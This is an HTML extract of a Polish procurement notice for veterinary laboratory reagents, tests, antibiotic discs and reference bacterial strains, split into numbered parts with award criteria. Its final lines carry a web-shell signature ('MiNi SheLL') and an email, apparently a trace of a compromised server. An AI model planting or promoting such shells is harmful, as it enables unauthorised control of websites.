DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Dostawa zestawu odczynników do diagnostyki Niedokrwistości Zakaźnej Koni (NZK)</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Antygen i surowica kontrolna do NZK – dodatnia i ujemna. - 600 oznaczeńWarunki wykonania zamówienia:1)	Do każdej partii towaru winien być załączony certyfikat jakości ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ) 2)	Wymagany okres gwarancji (termin ważności) zestawu - minimum 12 miesięcy od daty dostawy do laboratorium.	<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia	</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Dostawa testów do identyfikacji bakterii</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Test API Listeria	5 op.Warunki wykonania zamówienia:1.	Do każdej partii towaru winien być załączony certyfikat jakości ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ). 2.	Wymagany termin ważności testów - minimum 12 miesięcy od daty dostawy do laboratorium.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia	</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Dostawa testów do identyfikacji drobnoustrojów na będącym w posiadaniu Zamawiającego aparacie VITEK-2 compact 15 firmy Biomerieux</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Test VITEK 2 GN do identyfikacji pałeczek gram ujemnych	5 op2	Test VITEK 2 GP do identyfikacji ziarniaków gram dodatnich 5 op3	Test VITEK 2 YST do identyfikacji drożdżaków	1 op4	Test VITEK 2 NH do identyfikacji bakterii o wysokich wymaganiach wzrostowych	2 op5	Test VITEK 2 ANC do bakterii beztlenowych i Corynebacterium	2 opWarunki wykonania zamówienia:1.	Do każdej partii towaru winien być załączony certyfikat jakości. ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej )2.	Wymagany termin ważności testów - minimum 12 miesięcy od daty dostawy do laboratorium.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia	</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Dostawa testów do reakcji real-time PCR wraz z akcesoriami kompatybilnymi z posiadanym przez Zamawiającego aparatem Chromo 4</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Test real – time PCR do wykrywania Salmonella spp	10 op2	Sterylne stożkowe probówki z zamknięciem poj. 1,5 ml	1 op3	Akcesoria kompatybilne do aparatu Chromo 4: Paski 8-probówkowe do PCR na 0,2ml, płytkie, bez pokrywek, cienkościenne, białe	1 op4	Akcesoria kompatybilne do aparatu Chromo 4: Paski 8-pokrywkowe płytkie, optyczne do probówek na 0,2ml, ultraprzejrzyste	1 opWarunki wykonania zamówienia:Dotyczy pozycji nr 1:1)	Wymagany termin ważności testów – minimum 12 miesięcy od daty dostawy do laboratorium, natomiast po otwarciu testu minimum 2 miesiące.2)	Do każdej partii testów winny być załączony certyfikat jakości ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ).3)	Do testów należy dołączyć instrukcję postępowania z testem w języku polskim.4)	Całkowity czas wykonania analizy dla wszystkich rodzajów próbek: nie dłuższy niż 24 godziny łącznie z etapem przednamnażania dla Salmonella sp. w zbuforowanej wodzie peptonowej dla próbek żywności, środowiskowych i pasz, izolacji DNA i reakcji PCR.5)	Wykonawca winien w ramach ceny wykonania zamówienia, zainstalować oprogramowanie do odczytu prób oraz przeszkolić pracowników Zamawiającego w Zakładzie Higieny Weterynaryjnej w zakresie obsługi oprogramowania.Dotyczy pozycji nr 2, 3, 4: 1) Wymagany okres gwarancji (termin ważności) – minimum 12 miesięcy od daty dostawy do laboratorium. 2) Do każdej partii akcesoriów winny być załączone certyfikat jakości.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>7</td><td><b>Nazwa: </b></td><td>Dostawa krążków do antybiogramów</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Amikacyna 30μg	2 op. 2	Amoksycylina 25μg	2 op. 3	Amoksycylina z kwasem klawulanowym 20+10μg	3 op. 4	Ampicylina 2μg	3 op. 5	Bacitracin 10unit	2 op. 6	Cephalotin 30μg	2 op. 7	Cefoperazon 30μg	2 op. 8	Cefotaxym 30μg	2 op. 9	Cefovecin 30ug	2 op. 10	Cefoxitin 30ug	3 op. 11	Cefquinom10μg	2 op. 12	Ceftiofur 30μg	2 op. 13	Cefuroxym 30μg	2 op. 14	Chloramphenikol 30μg	5 op. 15	Ciprofloksacyna 5μg	5 op. 16	Enrofloksacyna 5μg	2 op. 17	Erytromycyna 15μg	5 op. 18	Florfenikol 30μg	2 op. 19	Flumequina 30μg	2 op. 20	Fosfomycin 50μg	2 op. 21	Fusidic acid 10ug	2 op. 22	Gentamycyna 10μg	4 op. 23	Imipenem 10ug	2 op. 24	Kanamycyna 30μg	2 op. 25	Klindamycyna 2μg	5 op. 26	Kloksacylina 5μg	2 op. 27	Kwas nalidyksowy 30μg	2 op. 28	Kwas pipemidowy 20μg	2 op. 29	Lincomycyna-spectinomycyna 109μg	5 op. 30	Marbofloksacyna 5μg	2 op. 31	Neomycyna 30μg	4 op. 32	Nitrofurantoina 100μg	2 op. 33	Norfloksacyna 10μg	5 op. 34	Novobiocin 30μg	2 op. 35	Oxacillin 1 ug	2 op. 36	Penicylina 1μg	5 op. 37	Streptomycyna 10μg	2 op. 38	Tetracyklina 30μg	5 op. 39	Tiamphenikol 30mcg 2 op. 40	Tobramycyna 10μg	2 op. 41	Trimethoprim 5ug	2 op. 42	Trimetoprim z sulfametoksazolem 1,25/23,75μg	4 op. 43	Tylozyna 30ug	2 op. 44	Vancomycin 5ug	2 op. 45	Tigecyline 15ug	4 op. 46	Gentamycyna 30ug	2 op. 47	Streptomycyna 300ug	2 op. Warunki wykonania zamówienia:1.	Do każdej partii towaru winien być załączony certyfikat jakości dostarczany wraz z towarem ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ).2.	Wymagany termin ważności dla krążków – minimum 24 miesiące od daty dostawy do laboratorium.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia	</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>8</td><td><b>Nazwa: </b></td><td>Dostawa odczynników mających zastosowanie podczas pracy ze szczepami wzorcowymi</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Wzorce do skali McFarlanda 1 zestaw2	Zestaw do przechowywania drobnoustrojów w warunkach głębokiego mrożenia – różne kolory 1 op.1)	Do każdego szczepu winien być załączony certyfikat jakości ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ). 2)	Wymagany termin ważności dla szczepów minimum 16-miesięcy od daty przysłania do laboratorium.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>9</td><td><b>Nazwa: </b></td><td>Dostawa szczepów wzorcowych</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	Szczep wzorcowy Staphylococcus aureus 1 op.2	Szczep wzorcowy Enterococcus faecalis 1 op.3	Szczep wzorcowy Pseudomonas aeruginosa 1 op.4	Szczep wzorcowy Escherichia coli	1 op.5	Szczep wzorcowy Clostridium perfringens 1 op.6	Szczep wzorcowy Salmonella Typhimurium 1 op.7	Szczep wzorcowy Listeria monocytogenes 1 op.8	Szczep wzorcowy Staphylococcus epidermidis 1 op.9	Szczep wzorcowy Rhodococcus equi 1 op.10	Szczep wzorcowy Aspergillus Niger 1 op.11	Szczep wzorcowy Campylobacter jejuni 1 op.12	Szczep wzorcowy Salmonella enteritidis 1 op.13	Szczep wzorcowy Klebsiella pneumoniae 1 op.14	Szczep wzorcowy Listeria innocua 1 op.15	Szczep wzorcowy Candida albicans 1 op.16	Szczep wzorcowy Salmonella Gallinarum 1 op.17	Szczep wzorcowy Paenibacillus larvae 1 op.18	Szczep wzorcowy Proteus mirabilis 1 op.19	Szczep wzorcowy Bacillus subtilis subsp. Spizizenii 1 op.20	Szczep wzorcowy Yersinia enterocolitica 1 op.21	Szczep wzorcowy Staphylococcus saprophyticus	1 op.22	Szczep wzorcowy Campylobacter coli	1 op.23	Szczep wzorcowyListeria ivanovii	1 op.24	Szczep wzorcowyMelissococcus plutonius	1 op.25	Szczep wzorcowyCampylobacter fetus	1 op.26	Szczep wzorcowy Salmonella Pullorum	1 op.27	Szczep wzorcowy Staphylococcus aureus 1 op.Warunki wykonania zamówienia:1)	Do każdej partii towaru winien być załączony certyfikat jakości ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ). 2)	Wymagany termin ważności dla szczepów minimum 18-miesięcy od daty przysłania do laboratorium.3)	Zamawiany materiał odniesienia to liofilizowane preparaty szczepów referencyjnych pochodzące max. z 2 pasażu<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>10</td><td><b>Nazwa: </b></td><td>Dostawa pozostałych komponentów i szybkich testów do diagnostyki chorób zakaźnych zwierząt</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.	DELVOTEST SP-NT	700 testów2	Zestaw do wykrywania i identyfikacji szczepów – paciorkowców Streptococcus sp. (latexowy)	3 op. 3	Test lateksowy do identyfikacji gronkowca złocistego (szybki test aglutynacyjny pozwalającym wykrywać czynnik zlepny (clumping factor), białko A oraz polisacharyd otoczkowy gronkowca złocistego (Staphylococcus aureus). 2 op.4	Paski testowe do wykrywania oksydazy cytochromowej	1000 szt. 5	Krążki ONPG do wykrywania β-galaktozydazy	500 szt.6	Bufor barbitalowy (weronalowy) do OWD	30 op. 7	Osocze królicze liofilizowane. 25 op. 8	Szybkie testy paskowe do wykrywania w kale Giardia Duodenalis 100 szt.9	Szybki test paskowy do wykrywania parwowirusa w kale 20 szt.10	Jednorazowy test diagnostyczny do wykrywania w kale psów: parwowirusa, coronawirusa i Giardii CPV/CCV/Giardia	10 szt11	Szybki test paskowy do wykrywania Cryptosporidium parvum w kale	10 sztWarunki wykonania zamówienia:1. Do każdej partii towaru winien być przesłany certyfikat jakości ( w formie pisemnej lub elektronicznej – w takiej sytuacji należy wskazać adres, pod którym znajduje się dokument w formie elektronicznej ).2. Wymagany termin ważności odczynników wymienionych w pozycjach:•	4,5 - minimum 6 miesięcy od daty dostawy do laboratorium,•	1-3; 6-11 - minimum 12 miesięcy od daty dostawy do laboratorium.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33694000-1, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 12<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena brutto wykonania zamówienia</td><td style="border: 1px solid black;border-collapse: collapse;">80,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">czas dostawy każdej partii towaru, licząc od dnia złożenia zamówienia	</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com